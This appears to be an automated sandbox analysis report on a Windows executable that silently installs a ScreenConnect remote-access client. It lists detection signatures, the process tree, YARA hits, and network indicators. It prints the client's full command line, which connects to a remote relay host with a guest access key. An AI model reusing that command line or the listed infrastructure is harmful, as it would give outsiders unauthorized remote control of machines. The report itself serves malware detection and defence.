Windows Analysis Report
tiG6Ep202n.exe

Overview

General Information

Sample name: tiG6Ep202n.exe
renamed because original name is a hash value
Original sample name: 58dff1cfcae1349d3e7cc009fb0cf1c109bdb4a5f3d2f8101ff9bd61d514a811.exe
Analysis ID: 1567468
MD5: e7e869eca1d9e7fb0c7197725f3e22e5
SHA1: 0443247608194aa371b80e0f398f7180436821bb
SHA256: 58dff1cfcae1349d3e7cc009fb0cf1c109bdb4a5f3d2f8101ff9bd61d514a811
Tags: exescreen-connectprotocol-essigneduser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score: 44
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 32
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • tiG6Ep202n.exe (PID: 5500 cmdline: "C:\Users\user\Desktop\tiG6Ep202n.exe" MD5: E7E869ECA1D9E7FB0C7197725F3E22E5)
    • msiexec.exe (PID: 5012 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 6900 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 3556 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 65BBBA74F7292B7FF205870D60C0A988 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 1588 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI9606.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6723343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 6436 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3D471D2A52DB95060FC9B91DC9E4C61F MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 2436 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding BC39C5326F99970A8179C0B7FC0A805D E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 6880 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=sc.connectprotocol.es&p=8041&s=16dcb7ee-2b94-4a51-a426-55c28e344f1f&k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ&t=OLD-01" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 504 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "75df5a49-a7b2-4825-b91e-9f1189beb45e" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
    • ScreenConnect.WindowsClient.exe (PID: 672 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "9ece94ec-15d3-44dc-8c54-6fbc056de45a" "System" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • svchost.exe (PID: 2144 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
tiG6Ep202n.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
C:\Windows\Installer\inprogressinstallinfo.ipi | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Temp\~DFA2315AC072D60478.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Temp\~DF05F0D14B49496305.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Temp\~DFA01B11556604F6BD.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Temp\~DF5F6339E16C6791FF.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2173892307.0000000005A60000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000009.00000002.4011949358.0000000002A51000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000000.00000002.2178858378.00000000068B1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
0.2.tiG6Ep202n.exe.5a60000.12.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
9.2.ScreenConnect.WindowsClient.exe.2acfa18.0.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
9.0.ScreenConnect.WindowsClient.exe.7e0000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0.2.tiG6Ep202n.exe.5a60000.12.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
11.2.ScreenConnect.WindowsClient.exe.28bfa50.4.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

System Summary

Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: ScreenConnect Client (a532d472f1ff1d4e) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 6900, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-66E1-82EBBD1A2A17}\(Default)
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2144, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: tiG6Ep202n.exe; ReversingLabs: Detection: 26%
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe; Code function: 8_2_0545155C CryptUnprotectData, 8_2_0545155C
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe; Code function: 8_2_05451528 CryptUnprotectData, 8_2_05451528
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe; Code function: 8_2_05452F88 CryptUnprotectData, 8_2_05452F88
Source: C:\Users\user\Desktop\tiG6Ep202n.exe; EXE: msiexec.exe

Compliance

Source: C:\Users\user\Desktop\tiG6Ep202n.exe; EXE: msiexec.exe
Source: tiG6Ep202n.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tiG6Ep202n.exe; Static PE information: certificate valid
Source: tiG6Ep202n.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: tiG6Ep202n.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: tiG6Ep202n.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: tiG6Ep202n.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.4024496608.0000000002147000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2264300548.0000000012850000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: tiG6Ep202n.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.4011949358.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258615488.0000000002841000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258312922.00000000026A2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2257943532.0000000002620000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: tiG6Ep202n.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.2194187109.0000000000B5D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: tiG6Ep202n.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.2168361518.0000000004D40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166340137.0000000004F83000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.2166340137.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: tiG6Ep202n.exe, MSI9C5F.tmp.3.dr, 6699ff.msi.3.dr, MSI9C7F.tmp.3.dr, 6699fe.rbs.3.dr, 6699fd.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr, MSIA097.tmp.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: tiG6Ep202n.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.4024496608.0000000002147000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2264300548.0000000012850000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: tiG6Ep202n.exe, 6699ff.msi.3.dr, 6699fd.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr, MSI9606.tmp.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258066054.0000000002662000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258066054.0000000002662000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.4024496608.0000000002147000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2264300548.0000000012850000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: tiG6Ep202n.exe
Source: C:\Windows\System32\msiexec.exe; File opened: z:
Source: C:\Windows\System32\msiexec.exe; File opened: x:
Source: C:\Windows\System32\msiexec.exe; File opened: v:
Source: C:\Windows\System32\msiexec.exe; File opened: t:
Source: C:\Windows\System32\msiexec.exe; File opened: r:
Source: C:\Windows\System32\msiexec.exe; File opened: p:
Source: C:\Windows\System32\msiexec.exe; File opened: n:
Source: C:\Windows\System32\msiexec.exe; File opened: l:
Source: C:\Windows\System32\msiexec.exe; File opened: j:
Source: C:\Windows\System32\msiexec.exe; File opened: h:
Source: C:\Windows\System32\msiexec.exe; File opened: f:
Source: C:\Windows\System32\msiexec.exe; File opened: b:
Source: C:\Windows\System32\msiexec.exe; File opened: y:
Source: C:\Windows\System32\msiexec.exe; File opened: w:
Source: C:\Windows\System32\msiexec.exe; File opened: u:
Source: C:\Windows\System32\msiexec.exe; File opened: s:
Source: C:\Windows\System32\msiexec.exe; File opened: q:
Source: C:\Windows\System32\msiexec.exe; File opened: o:
Source: C:\Windows\System32\msiexec.exe; File opened: m:
Source: C:\Windows\System32\msiexec.exe; File opened: k:
Source: C:\Windows\System32\msiexec.exe; File opened: i:
Source: C:\Windows\System32\msiexec.exe; File opened: g:
Source: C:\Windows\System32\msiexec.exe; File opened: e:
Source: C:\Windows\System32\svchost.exe; File opened: c:
Source: C:\Windows\System32\msiexec.exe; File opened: a:

Networking

Source: C:\Windows\System32\msiexec.exe; Registry value created: NULL Service
Source: global traffic; TCP traffic: 192.168.2.6:49710 -> 38.69.12.167:8041
Source: Joe Sandbox View; IP Address: 38.69.12.167
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: sc.connectprotocol.es
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2264300548.0000000012850000.00000004.00000800.00020000.00000000.sdmp, tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: svchost.exe, 0000000A.00000002.3879697188.0000027B7C400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2264300548.0000000012850000.00000004.00000800.00020000.00000000.sdmp, tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                                  Source: qmgr.db.10.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2150232291.0000000003171000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.4013580934.0000000001364000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258615488.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: rundll32.exe, 00000005.00000003.2166340137.0000000004F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166340137.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166528725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                                  Source: rundll32.exe, 00000005.00000003.2166340137.0000000004F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166340137.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166528725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/news/
                                  Source: rundll32.exe, 00000005.00000003.2166340137.0000000004F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166340137.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166528725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/releases/
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: ScreenConnect.WindowsCredentialProvider.dll.3.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                                  Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                                  Source: qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                                  Source: svchost.exe, 0000000A.00000003.2233323680.0000027B7C2D0000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:

                                  Spam, unwanted Advertisements and Ransom Demands

                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
